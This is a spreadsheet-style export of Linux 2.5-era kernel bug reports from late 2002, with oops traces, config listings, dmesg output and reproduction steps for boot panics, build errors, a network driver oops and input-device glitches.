    <t>Please enter Exact Kernel version: 2.5.46 Distribution: Suse 8.0 Hardware Environment: Dual Pentium III (Coppermine), CPU speed 997.3431 MHz. Software Environment: Problem Description: kernel crash at boot Steps to reproduce: I get kernel crash right after : ICH: chipset revision 2 ICH: not 100% native mode: will probe irqs later ide1: BM-DMA at 0xffa8-0xffaf, &lt;1&gt;Unable to handle kernel NULL ptr dereferece at virtual address 000006b4 EIP: C0206266 Oops ... some kernel threads info, then .. &lt;0&gt;kernel panic, attempted to kill init -------------------------- Compiled 2.5.46, here are relevant parts from /usr/src/linux/.config CONFIG_X86=y CONFIG_MMU=y CONFIG_SWAP=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y # # CONFIG_EXPERIMENTAL is not set CONFIG_NET=y CONFIG_SYSVIPC=y # CONFIG_BSD_PROCESS_ACCT is not set CONFIG_SYSCTL=y CONFIG_MODULES=y CONFIG_MODVERSIONS=y CONFIG_KMOD=y # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set CONFIG_MPENTIUMIII=y # CONFIG_MPENTIUM4 is not set # CONFIG_MK6 is not set # CONFIG_MK7 is not set # CONFIG_MELAN is not set # CONFIG_MCRUSOE is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MCYRIXIII is not set CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=5 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_TSC=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y # CONFIG_HUGETLB_PAGE is not set CONFIG_SMP=y CONFIG_PREEMPT=y CONFIG_X86_UP_APIC=y CONFIG_X86_LOCAL_APIC=y CONFIG_X86_IO_APIC=y CONFIG_NR_CPUS=2 # CONFIG_X86_NUMA is not set # CONFIG_X86_MCE is not set # CONFIG_CPU_FREQ is not set # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set CONFIG_MICROCODE=y CONFIG_X86_MSR=y CONFIG_X86_CPUID=y CONFIG_NOHIGHMEM=y # CONFIG_HIGHMEM4G is not set # CONFIG_HIGHMEM64G is not set # CONFIG_MATH_EMULATION is not set CONFIG_MTRR=y CONFIG_HAVE_DEC_LOCK=y CONFIG_ACPI is not set CONFIG_PM=y CONFIG_APM=y CONFIG_APM_IGNORE_USER_SUSPEND=y CONFIG_APM_DO_ENABLE=y CONFIG_APM_CPU_IDLE=y CONFIG_APM_DISPLAY_BLANK=y CONFIG_APM_RTC_IS_GMT=y CONFIG_APM_ALLOW_INTS=y # CONFIG_APM_REAL_MODE_POWER_OFF is not set CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y # CONFIG_SCx200 is not set CONFIG_PCI_NAMES=y CONFIG_ISA=y CONFIG_EISA=y # CONFIG_MCA is not set CONFIG_HOTPLUG=y # CONFIG_PCMCIA is not set CONFIG_KCORE_ELF=y # CONFIG_KCORE_AOUT is not set CONFIG_BINFMT_AOUT=y CONFIG_BINFMT_ELF=y CONFIG_BINFMT_MISC=y # CONFIG_MTD is not set CONFIG_PARPORT=y CONFIG_PARPORT_PC=y # CONFIG_PARPORT_OTHER is not set CONFIG_PARPORT_1284=y CONFIG_PNP=y CONFIG_PNP_NAMES=y CONFIG_PNP_DEBUG=y CONFIG_BLK_DEV_FD=y # CONFIG_BLK_DEV_XD is not set # CONFIG_PARIDE is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set CONFIG_BLK_DEV_LOOP=m CONFIG_BLK_DEV_NBD=m CONFIG_BLK_DEV_RAM=m CONFIG_BLK_DEV_RAM_SIZE=4096 # CONFIG_LBD is not set CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y # CONFIG_BLK_DEV_HD_IDE is not set # CONFIG_BLK_DEV_HD is not set # CONFIG_BLK_DEV_IDEDISK is not set CONFIG_BLK_DEV_IDECD=y CONFIG_BLK_DEV_IDEFLOPPY=y # CONFIG_BLK_DEV_IDESCSI is not set # CONFIG_IDE_TASK_IOCTL is not set CONFIG_BLK_DEV_CMD640=y CONFIG_BLK_DEV_CMD640_ENHANCED=y CONFIG_BLK_DEV_IDEPCI=y CONFIG_BLK_DEV_GENERIC=y CONFIG_IDEPCI_SHARE_IRQ=y CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_OFFBOARD is not set # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set CONFIG_BLK_DEV_IDEDMA=y CONFIG_BLK_DEV_ADMA=y # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5530 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set CONFIG_BLK_DEV_PIIX=y # CONFIG_BLK_DEV_NFORCE is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_RZ1000 is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set # CONFIG_BLK_DEV_VIA82CXXX is not set # CONFIG_IDE_CHIPSETS is not set CONFIG_IDEDMA_AUTO=y # CONFIG_IDEDMA_IVB is not set CONFIG_BLK_DEV_IDE_MODES=y CONFIG_SCSI=y CONFIG_BLK_DEV_SD=y CONFIG_CHR_DEV_ST=y # CONFIG_CHR_DEV_OSST is not set CONFIG_BLK_DEV_SR=y CONFIG_BLK_DEV_SR_VENDOR=y CONFIG_SR_EXTRA_DEVS=2 # CONFIG_CHR_DEV_SG is not set CONFIG_SCSI_MULTI_LUN=y CONFIG_SCSI_REPORT_LUNS=y CONFIG_SCSI_CONSTANTS=y # CONFIG_SCSI_LOGGING is not set CONFIG_SCSI_AIC7XXX=y CONFIG_AIC7XXX_CMDS_PER_DEVICE=64 CONFIG_AIC7XXX_RESET_DELAY_MS=2000 # CONFIG_CD_NO_IDESCSI is not set # CONFIG_MD is not set # CONFIG_FUSION is not set # CONFIG_I2O is not set (the rst it's not relevant, I think) ----------------------------- Dmesg of working system: Linux version 2.4.19 (root@pvil-f-147) (gcc version 2.95.3 20010315 (SuSE)) #4 SMP Thu Nov 14 05:30:02 PST 2002 BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 00000000000a0000 (usable) BIOS-e820: 00000000000f0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 000000003ff9e000 (usable) BIOS-e820: 000000003ff9e000 - 0000000040000000 (reserved) BIOS-e820: 00000000fec00000 - 00000000fec10000 (reserved) BIOS-e820: 00000000fee00000 - 00000000fee10000 (reserved) BIOS-e820: 00000000ffb00000 - 0000000100000000 (reserved) Warning only 896MB will be used. Use a HIGHMEM enabled kernel. 896MB LOWMEM available. found SMP MP-table at 000fe710 hm, page 000fe000 reserved twice. hm, page 000ff000 reserved twice. hm, page 000f0000 reserved twice. Advanced speculative caching feature not present On node 0 totalpages: 229376 zone(0): 4096 pages. zone(1): 225280 pages. zone(2): 0 pages. Intel MultiProcessor Specification v1.4 Virtual Wire compatibility mode. OEM ID: DELL Product ID: WS 620 APIC at: 0xFEE00000 Processor #0 Pentium(tm) Pro APIC version 17 Processor #1 Pentium(tm) Pro APIC version 17 I/O APIC #2 Version 32 at 0xFEC00000. Processors: 2 Kernel command line: auto BOOT_IMAGE=linux-ntfs ro root=805 Initializing CPU#0 Detected 997.476 MHz processor. Console: colour VGA+ 80x25 Calibrating delay loop... 1992.29 BogoMIPS Memory: 904648k/917504k available (1442k kernel code, 12472k reserved, 444k data, 264k init, 0k highmem) Dentry cache hash table entries: 131072 (order: 8, 1048576 bytes) Inode cache hash table entries: 65536 (order: 7, 524288 bytes) Mount-cache hash table entries: 16384 (order: 5, 131072 bytes) Buffer-cache hash table entries: 65536 (order: 6, 262144 bytes) Page-cache hash table entries: 262144 (order: 8, 1048576 bytes) CPU: Before vendor init, caps: 0383fbff 00000000 00000000, vendor = 0 CPU: L1 I cache: 16K, L1 D cache: 16K CPU: L2 cache: 256K CPU: After vendor init, caps: 0383fbff 00000000 00000000 00000000 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#0. CPU: After generic, caps: 0383fbff 00000000 00000000 00000000 CPU: Common caps: 0383fbff 00000000 00000000 00000000 Enabling fast FPU save and restore... done. Enabling unmasked SIMD FPU exception support... done. Checking 'hlt' instruction... OK. POSIX conformance testing by UNIFIX CPU: Before vendor init, caps: 0383fbff 00000000 00000000, vendor = 0 CPU: L1 I cache: 16K, L1 D cache: 16K CPU: L2 cache: 256K CPU: After vendor init, caps: 0383fbff 00000000 00000000 00000000 Intel machine check reporting enabled on CPU#0. CPU: After generic, caps: 0383fbff 00000000 00000000 00000000 CPU: Common caps: 0383fbff 00000000 00000000 00000000 CPU0: Intel Pentium III (Coppermine) stepping 06 per-CPU timeslice cutoff: 731.70 usecs. enabled ExtINT on CPU#0 ESR value before enabling vector: 00000040 ESR value after enabling vector: 00000000 Booting processor 1/1 eip 2000 Initializing CPU#1 masked ExtINT on CPU#1 ESR value before enabling vector: 00000000 ESR value after enabling vector: 00000000 Calibrating delay loop... 1992.29 BogoMIPS CPU: Before vendor init, caps: 0383fbff 00000000 00000000, vendor = 0 CPU: L1 I cache: 16K, L1 D cache: 16K CPU: L2 cache: 256K CPU: After vendor init, caps: 0383fbff 00000000 00000000 00000000 Intel machine check reporting enabled on CPU#1. CPU: After generic, caps: 0383fbff 00000000 00000000 00000000 CPU: Common caps: 0383fbff 00000000 00000000 00000000 CPU1: Intel Pentium III (Coppermine) stepping 06 Total of 2 processors activated (3984.58 BogoMIPS). ENABLING IO-APIC IRQs Setting 2 in the phys_id_present_map ...changing IO-APIC physical APIC ID to 2 ... ok. init IO_APIC IRQs IO-APIC (apicid-pin) 2-0, 2-13, 2-20, 2-21, 2-22, 2-23 not connected. ..TIMER: vector=0x31 pin1=2 pin2=0 number of MP IRQ sources: 62. number of IO-APIC #2 registers: 24. testing the IO APIC....................... IO APIC #2...... .... register #00: 02000000 ....... : physical APIC id: 02 .... register #01: 00170020 ....... : max redirection entries: 0017 ....... : PRQ implemented: 0 ....... : IO APIC version: 0020 .... register #02: 00000000 ....... : arbitration: 00 .... IRQ redirection table: NR Log Phy Mask Trig IRR Pol Stat Dest Deli Vect: 00 000 00 1 0 0 0 0 0 0 00 01 003 03 0 0 0 0 0 1 1 39 02 003 03 0 0 0 0 0 1 1 31 03 003 03 0 0 0 0 0 1 1 41 04 003 03 0 0 0 0 0 1 1 49 05 003 03 0 0 0 0 0 1 1 51 06 003 03 0 0 0 0 0 1 1 59 07 003 03 0 0 0 0 0 1 1 61 08 003 03 0 0 0 0 0 1 1 69 09 003 03 0 0 0 0 0 1 1 71 0a 003 03 0 0 0 0 0 1 1 79 0b 003 03 0 0 0 0 0 1 1 81 0c 003 03 0 0 0 0 0 1 1 89 0d 000 00 1 0 0 0 0 0 0 00 0e 003 03 0 0 0 0 0 1 1 91 0f 003 03 0 0 0 0 0 1 1 99 10 003 03 1 1 0 1 0 1 1 A1 11 003 03 1 1 0 1 0 1 1 A9 12 003 03 1 1 0 1 0 1 1 B1 13 003 03 1 1 0 1 0 1 1 B9 14 000 00 1 0 0 0 0 0 0 00 15 000 00 1 0 0 0 0 0 0 00 16 000 00 1 0 0 0 0 0 0 00 17 000 00 1 0 0 0 0 0 0 00 IRQ to pin mappings: IRQ0 -&gt; 0:2 IRQ1 -&gt; 0:1 IRQ3 -&gt; 0:3 IRQ4 -&gt; 0:4 IRQ5 -&gt; 0:5 IRQ6 -&gt; 0:6 IRQ7 -&gt; 0:7 IRQ8 -&gt; 0:8 IRQ9 -&gt; 0:9 IRQ10 -&gt; 0:10 IRQ11 -&gt; 0:11 IRQ12 -&gt; 0:12 IRQ14 -&gt; 0:14 IRQ15 -&gt; 0:15 IRQ16 -&gt; 0:16 IRQ17 -&gt; 0:17 IRQ18 -&gt; 0:18 IRQ19 -&gt; 0:19 .................................... done. Using local APIC timer interrupts. calibrating APIC timer ... ..... CPU clock speed is 997.3431 MHz. ..... host bus clock speed is 132.9788 MHz. cpu: 0, clocks: 1329788, slice: 443262 CPU0&lt;T0:1329776,T1:886512,D:2,S:443262,C:1329788&gt; cpu: 1, clocks: 1329788, slice: 443262 CPU1&lt;T0:1329776,T1:443248,D:4,S:443262,C:1329788&gt; checking TSC synchronization across CPUs: passed. Waiting on wait_init_idle (map = 0x2) All processors have done init_idle PCI: PCI BIOS revision 2.10 entry at 0xfc03e, last bus=4 PCI: Using configuration type 1 PCI: Probing PCI hardware Unknown bridge resource 0: assuming transparent Unknown bridge resource 0: assuming transparent Unknown bridge resource 2: assuming transparent Unknown bridge resource 0: assuming transparent Unknown bridge resource 1: assuming transparent Unknown bridge resource 2: assuming transparent Unknown bridge resource 2: assuming transparent PCI: Using IRQ router PIIX [8086/2410] at 00:1f.0 PCI-&gt;APIC IRQ transform: (B0,I31,P3) -&gt; 19 PCI-&gt;APIC IRQ transform: (B0,I31,P1) -&gt; 17 PCI-&gt;APIC IRQ transform: (B1,I0,P0) -&gt; 16 PCI-&gt;APIC IRQ transform: (B4,I4,P0) -&gt; 16 PCI-&gt;APIC IRQ transform: (B4,I5,P0) -&gt; 17 PCI-&gt;APIC IRQ transform: (B4,I5,P1) -&gt; 18 PCI-&gt;APIC IRQ transform: (B4,I7,P0) -&gt; 19 isapnp: Scanning for PnP cards... isapnp: No Plug &amp; Play device found Linux NET4.0 for Linux 2.4 Based upon Swansea University Computer Society NET3.039 Initializing RT netlink socket apm: BIOS version 1.2 Flags 0x03 (Driver version 1.16) apm: disabled - APM is not SMP safe. Starting kswapd Journalled Block Device driver loaded parport0: PC-style at 0x378 (0x778) [PCSPP(,...)] parport0: irq 7 detected pty: 256 Unix98 ptys configured Serial driver version 5.05c (2001-07-08) with MANY_PORTS SHARE_IRQ SERIAL_PCI ISAPNP enabled ttyS00 at 0x03f8 (irq = 4) is a 16550A ttyS01 at 0x02f8 (irq = 3) is a 16550A Uniform Multi-Platform E-IDE driver Revision: 6.31 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx ICH: IDE controller on PCI bus 00 dev f9 ICH: chipset revision 2 ICH: not 100% native mode: will probe irqs later ide1: BM-DMA at 0xffa8-0xffaf, BIOS settings: hdc:DMA, hdd:pio hdc: Lite-On LTN483S 48x Max, ATAPI CD/DVD-ROM drive hdd: IOMEGA ZIP 250 ATAPI Floppy, ATAPI FLOPPY drive ide1 at 0x170-0x177,0x376 on irq 15 hdc: ATAPI 48X CD-ROM drive, 120kB Cache, UDMA(33) Uniform CD-ROM driver Revision: 3.12 Floppy drive(s): fd0 is 1.44M FDC 0 is a National Semiconductor PC87306 3c59x: Donald Becker and others. www.scyld.com/network/vortex.html 04:07.0: 3Com PCI 3c905C Tornado at 0xe480. Vers LK1.1.16 Linux video capture interface: v1.00 Linux agpgart interface v0.99 (c) Jeff Hartmann agpgart: Maximum main memory to use for agp memory: 816M agpgart: Detected Intel i840 chipset agpgart: AGP aperture is 64M @ 0xf0000000 SCSI subsystem driver Revision: 1.00 scsi0 : Adaptec AIC7XXX EISA/VLB/PCI SCSI HBA DRIVER, Rev 6.2.8 &lt;Adaptec aic7899 Ultra160 SCSI adapter&gt; aic7899: Ultra160 Wide Channel A, SCSI Id=7, 32/253 SCBs scsi1 : Adaptec AIC7XXX EISA/VLB/PCI SCSI HBA DRIVER, Rev 6.2.8 &lt;Adaptec aic7899 Ultra160 SCSI adapter&gt; aic7899: Ultra160 Wide Channel B, SCSI Id=7, 32/253 SCBs Vendor: QUANTUM Model: ATLAS10K2-TY367L Rev: DA40 Type: Direct-Access ANSI SCSI revision: 03 (scsi0:A:0): 160.000MB/s transfers (80.000MHz DT, offset 127, 16bit) scsi0:A:0:0: Tagged Queuing enabled. Depth 253 Attached scsi disk sda at scsi0, channel 0, id 0, lun 0 SCSI device sda: 71132959 512-byte hdwr sectors (36420 MB) Partition check: sda: sda1 sda2 &lt; sda5 sda6 sda7 sda8 sda9 &gt; ... the rest is irrelevant ....</t>
  </si>
  <si>
    <t>IPV4</t>
  </si>
  <si>
    <t>Riva Framebuffer doesn't compile</t>
  </si>
  <si>
    <t>2002-11-14 18:21 UTC</t>
  </si>
  <si>
    <t>Luke-Jr</t>
  </si>
  <si>
    <t>2002-12-17 14:31 UTC</t>
  </si>
  <si>
    <t>undefined reference to `boot_gdt_table'</t>
  </si>
  <si>
    <t>Alternate Trees</t>
  </si>
  <si>
    <t>ac</t>
  </si>
  <si>
    <t>2002-11-14 20:41 UTC</t>
  </si>
  <si>
    <t>Warren Togami</t>
  </si>
  <si>
    <t>2003-03-06 13:48 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.47-ac4 Distribution: Red Hat 8.0 Hardware Environment: Sony Vaio FXA36 (Athlon 4 laptop) Software Environment: gcc version 3.2 20020903 (Red Hat Linux 8.0 3.2-7) Problem Description: make bzImage fails with the following error: ld -m elf_i386 -e stext -T arch/i386/vmlinux.lds.s arch/i386/kernel/head.o arch/i386/kernel/init_task.o init/built-in.o --start-group usr/built-in.o arch/i386/kernel/built-in.o arch/i386/mm/built-in.o arch/i386/mach-generic/built-in.o kernel/built-in.o mm/built-in.o fs/built-in.o ipc/built-in.o security/built-in.o crypto/built-in.o drivers/built-in.o sound/built-in.o arch/i386/pci/built-in.o net/built-in.o lib/lib.a arch/i386/lib/lib.a --end-group -o .tmp_vmlinux1 arch/i386/kernel/built-in.o: In function `gdt_48': arch/i386/kernel/built-in.o(.data+0x1521): undefined reference to `boot_gdt_table' make: *** [.tmp_vmlinux1] Error 1 Please let me know if I should post my .config, or if this is an inappropriate type of bug report. Thanks.</t>
  </si>
  <si>
    <t>2.5.47-ac4 panics on boot.</t>
  </si>
  <si>
    <t>Timers</t>
  </si>
  <si>
    <t>Interval Timers</t>
  </si>
  <si>
    <t>2002-11-14 22:11 UTC</t>
  </si>
  <si>
    <t>Justin A</t>
  </si>
  <si>
    <t>2003-01-05 11:37 UTC</t>
  </si>
  <si>
    <t>Please enter Exact Kernel version: 2.5.47-ac4 Distribution: debian testing Hardware Environment: thinkpad 760e Software Environment: init? Problem Description: Gets as far as the depmod -a in init and panics: (unfortunately the top is cut off...it doesn't fit:)) I think it said something about BUG in slab....There isn't a way to scroll up after a panic is there? ... CPU: 0 EIP: 0060:[&lt;c012b914&gt;] Not tainted EFLAGS: 00010006 EIP is at reap_timer_fnc+0x104/0x40c eax: 00000002 ebx: c47ffab4 ecx: c47fe8a0 edx: 00000003 esi: 00000002 edi: c4742414 ebp: c47ffa98 esp: c031df8c ds: 0068 es: 0068 ss: 0068 Process swapper (pid: 0, threadinfo=c031c000 task=c02da3e0) Stack: same as call trace... Call trace: [&lt;c012b810&gt;] reap_timer_fnc+0x0/0x40c [&lt;c011ae47&gt;] run_timer_tasklet+0xb7/0xe8 [&lt;c0117f39&gt;] tasklet_hi_action+0x3d/0x60 [&lt;c0117d5a&gt;] do_softirq+0x5a/0xac [&lt;c010a268&gt;] do_IRQ+0xc8/0xd4 [&lt;c0105000&gt;] stext+0x0/0x1c [&lt;c0108b03&gt;] common_interrupt+0x43/x060 Code: 0f 0b fb 07 a8 fe 21 c0 8d 74 26 00 8b 41 04 8b 11 89 42 04 I tried it a few times...the last few change, but its always in reap_timer_fnc. 2.5.47 does the same thing too, but 2.4.18/19 work. Steps to reproduce: boot :)</t>
  </si>
  <si>
    <t>8139too ifconfig causes oops</t>
  </si>
  <si>
    <t>2002-11-14 22:56 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.47-ac4 Distribution: Red Hat 8.0 Hardware Environment: Sony Vaio FXA36 (Athlon Palomino laptop) Software Environment: gcc version 3.2 20020903 (Red Hat Linux 8.0 3.2-7) Problem Description: If I type "ifconfig" after I have removed the 8139too module, it always causes a kernel oops and ifconfig dies with a segmentation fault. If I manually insert the modules with modprobe ifconfig works properly. (Sometimes while I am shutting down it displays some error about a "buggy driver" after it attempts to shut down the eth0 interface. Having difficulty reproducing this behavior.) Steps to reproduce: 1. Bootup system. 2. ifdown eth0 3. modprobe -r 8139too 4. (below) [root@laptop root]# ifconfig Unable to handle kernel paging request at virtual address e08ba550 printing eip: e08ba550 *pde = 01531067 *pte = 00000000 Oops: 0000 sr_mod snd-pcm-oss snd-mixer-oss snd-via82xx snd-pcm snd-timer snd-mpu401-uart snd-rawmidi snd-seq-device snd-ac97-codec snd soundcore autofs crc32 ide-scsi scsi_mod ide-cd cdrom ohci1394 ieee1394 ext3 CPU: 0 EIP: 0060:[&lt;e08ba550&gt;] Not tainted EFLAGS: 00010286 EIP is at E __insmod_crc32_S.bss_L8+0x5e74/0x8 [crc32] eax: e08ba550 ebx: dee42800 ecx: 00000000 edx: c029bf16 esi: d66dc143 edi: 00000400 ebp: 00000000 esp: d69c5ec8 ds: 0068 es: 0068 ss: 0068 Process ifconfig (pid: 5641, threadinfo=d69c4000 task=d8b033c0) Stack: c02244ab dee42800 c029bec0 c0370e20 0000134a 0000004a 00000000 00000000 00000000 00000000 00000000 00000000 0000134a 0000004a 00000000 00000000 00000000 00000000 00000000 00000000 dee42800 00000143 c0224512 d66dc143 Call Trace: [&lt;c02244ab&gt;] sprintf_stats+0xdb/0xf0 [&lt;c0224512&gt;] dev_get_info+0x52/0xc0 [&lt;c0173d21&gt;] proc_file_read+0x1a1/0x1c0 [&lt;c0149e5a&gt;] vfs_read+0xda/0x140 [&lt;c011062f&gt;] sys_mmap2+0x9f/0xe0 [&lt;c014a0fe&gt;] sys_read+0x3e/0x60 [&lt;c010af2b&gt;] syscall_call+0x7/0xb Code: Bad EIP value. &lt;6&gt;note: ifconfig[5641] exited with preempt_count 1 Debug: sleeping function called from illegal context at net/socket.c:889 Call Trace: [&lt;c021c304&gt;] sock_fasync+0x54/0x3a0 [&lt;c021c28b&gt;] sock_close+0x2b/0x50 [&lt;c014b4f0&gt;] __fput+0xf0/0x100 [&lt;c01491e4&gt;] filp_close+0x74/0xa0 [&lt;c011eef7&gt;] put_files_struct+0x57/0xc0 [&lt;c011f5f3&gt;] do_exit+0x153/0x320 [&lt;c010b695&gt;] die+0x85/0x90 [&lt;c0116837&gt;] do_page_fault+0x157/0x487 [&lt;c017bd69&gt;] __journal_file_buffer+0x179/0x240 [&lt;c016117e&gt;] alloc_inode+0x17e/0x1b0 [&lt;c0171878&gt;] proc_alloc_inode+0x18/0x50 [&lt;c016117e&gt;] alloc_inode+0x17e/0x1b0 [&lt;c0161b17&gt;] get_new_inode_fast+0x47/0xf0 [&lt;c026f64b&gt;] vsnprintf+0x1fb/0x440 [&lt;c01166e0&gt;] do_page_fault+0x0/0x487 [&lt;c010b0e5&gt;] error_code+0x2d/0x38 [&lt;c02244ab&gt;] sprintf_stats+0xdb/0xf0 [&lt;c0224512&gt;] dev_get_info+0x52/0xc0 [&lt;c0173d21&gt;] proc_file_read+0x1a1/0x1c0 [&lt;c0149e5a&gt;] vfs_read+0xda/0x140 [&lt;c011062f&gt;] sys_mmap2+0x9f/0xe0 [&lt;c014a0fe&gt;] sys_read+0x3e/0x60 [&lt;c010af2b&gt;] syscall_call+0x7/0xb Segmentation Fault Here is this RealTek device from lspci -vn: 00:10.0 Class 0200: 10ec:8139 (rev 10) Subsystem: 104d:80f6 Flags: bus master, medium devsel, latency 128, IRQ 10 I/O ports at 1800 [size=256] Memory at e8004800 (32-bit, non-prefetchable) [size=256] Capabilities: [50] Power Management version 2</t>
  </si>
  <si>
    <t>radeonfb does not compile at all - seems incomplete? or what?</t>
  </si>
  <si>
    <t>Video(Other)</t>
  </si>
  <si>
    <t>2002-11-14 23:36 UTC</t>
  </si>
  <si>
    <t>Joshua K.</t>
  </si>
  <si>
    <t>2003-03-17 14:48 UTC</t>
  </si>
  <si>
    <t>Block Layer</t>
  </si>
  <si>
    <t>Jens Axboe</t>
  </si>
  <si>
    <t>ide-scsi causing (Two mice: unwanted double-clicks &amp; erratic behavior)</t>
  </si>
  <si>
    <t>2002-11-15 01:05 UTC</t>
  </si>
  <si>
    <t>2003-02-21 04:25 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.47-ac4 Distribution: Red Hat Linux 8.0 Hardware Environment: Sony Vaio FXA36 (Athlon Palomino laptop) Software Environment: gcc version 3.2 20020903 (Red Hat Linux 8.0 3.2-7) Problem Description: My laptop uses two mice devices simultaneously, the built in touchpad and a USB mouse. Red Hat 8.0 by default will configure an extra USB mouse that can be plugged in at any time while running XFree86 4.2. This dual mouse setup works great in 2.4.18 through 20rc kernels but displays the following erratic and almost unusable behavior in 2.5.47-ac4. USB mouse (Logitech Optical + Wheel): This mouse moves around the screen smoothly, but every second stalls then jumps even while the computer is at 0% CPU utilization. Clicking almost always double-clicks or more. PS/2 touchpad: This mouse device is almost unusable. Simply moving the pointer will work perhaps 75% of the time, but the other times jump around erratically clicking and dragging things on the screen with a mind of its own. It sometimes middle-clicked without being asked too. If I don't touch the touchpad, none of this occurs. I get a lot of these errors in dmesg when using the touch pad: psmouse.c: Lost synchronization, throwing 2 bytes away. psmouse.c: Lost synchronization, throwing 2 bytes away. psmouse.c: Lost synchronization, throwing 1 bytes away. psmouse.c: Lost synchronization, throwing 1 bytes away.</t>
  </si>
  <si>
    <t>nfs broken in UP? unresolved symbol page_states__per_cpu</t>
  </si>
  <si>
    <t>2002-11-15 01:10 UTC</t>
  </si>
  <si>
    <t>2003-03-06 12:22 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.47-ac4 Distribution: Red Hat Linux 8.0 Hardware Environment: Sony Vaio FXA36 (Athlon Palomino laptop) Software Environment: gcc version 3.2 20020903 (Red Hat Linux 8.0 3.2-7) Problem Description: Is nfs broken without SMP? [root@laptop mnt]# modprobe nfs /lib/modules/2.5.47-ac4/kernel/fs/nfs/nfs.o: unresolved symbol page_states__per_cpu /lib/modules/2.5.47-ac4/kernel/fs/nfs/nfs.o: insmod /lib/modules/2.5.47-ac4/kernel/fs/nfs/nfs.o failed /lib/modules/2.5.47-ac4/kernel/fs/nfs/nfs.o: insmod nfs failed</t>
  </si>
  <si>
    <t>register_console() called in illegal context</t>
  </si>
  <si>
    <t>2002-11-15 04:01 UTC</t>
  </si>
  <si>
    <t>2003-11-26 16:09 UTC</t>
  </si>
  <si>
    <t>James Simmons</t>
  </si>
  <si>
    <t>Please enter Exact Kernel version:2.5.38 Subject: 2.5.38 semaphore.c calls sleeping function in illegal context From: William Lee Irwin III &lt;wli@holomorphy.com&gt; Date: 2002-09-24 0:20:52 ksymoops 2.4.6 on i686 2.5.38-2. Options used -v /mnt/b/2.5.38/vmlinux-2.5.38-2 (specified) -K (specified) -L (specified) -O (specified) -m /boot/System.map-2.5.38-2 (specified) Reading Oops report from the terminal c02c9f6c c02c9f84 c01175f7 c0260f80 c0261500 0000007e c02c9f98 c011a4a1 c0261500 0000007e 00000000 c02c9fac c011a78a c0312480 c0278213 c0383244 c02c9fb8 c02d8316 c02ba640 c02c9fc0 c02d8164 c02c9fd0 c02d8a4b 00000000 Call Trace: [&lt;c01175f7&gt;] [&lt;c011a4a1&gt;] [&lt;c011a78a&gt;] [&lt;c0105000&gt;] Warning (Oops_read): Code line not seen, dumping what data is available Trace; c01175f7 &lt;__might_sleep+27/2b&gt; Trace; c011a4a1 &lt;acquire_console_sem+2d/50&gt; Trace; c011a78a &lt;register_console+122/1cc&gt; Trace; c0105000 &lt;_stext+0/0&gt;</t>
  </si>
  <si>
    <t>Power-Battery</t>
  </si>
  <si>
    <t>PNP</t>
  </si>
  <si>
    <t>Paul Laufer</t>
  </si>
  <si>
    <t>100% reproduceable "null TTY for (####) in tty_fasync"</t>
  </si>
  <si>
    <t>2002-11-15 10:02 UTC</t>
  </si>
  <si>
    <t>2003-02-12 10:00 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.47-bk2, many others Distribution: Debian Testing Hardware Environment: single P2 CPU, Intel mobo Software Environment: preempt enabled Problem Description: I can reliably reproduce this message on my console: "Warning: null TTY for (88:00) in tty_fasync" This message comes from drivers/char/tty_io.c Steps to reproduce: Open two SSH sessions into a linux machine running 2.5.47. On one session, do 'dd if=/dev/zero of=/dev/null &amp;'. When this backgrounds, type 'logout' (the logout doesn't seem to happen if you still have background tasks). On the other session, kill the dd PID. I get the null tty message 100% of the time. It doesn't happen with telnet, or on the console, but only via ssh (either via loopback or from another host). I happen to be using OpenSSH 3.4p1-4 from Debian Testing, but it has been doing this for a while.</t>
  </si>
  <si>
    <t>2002-11-15 11:41 UTC</t>
  </si>
  <si>
    <t>Andy Dustman</t>
  </si>
  <si>
    <t>2002-12-03 20:35 UTC</t>
  </si>
  <si>
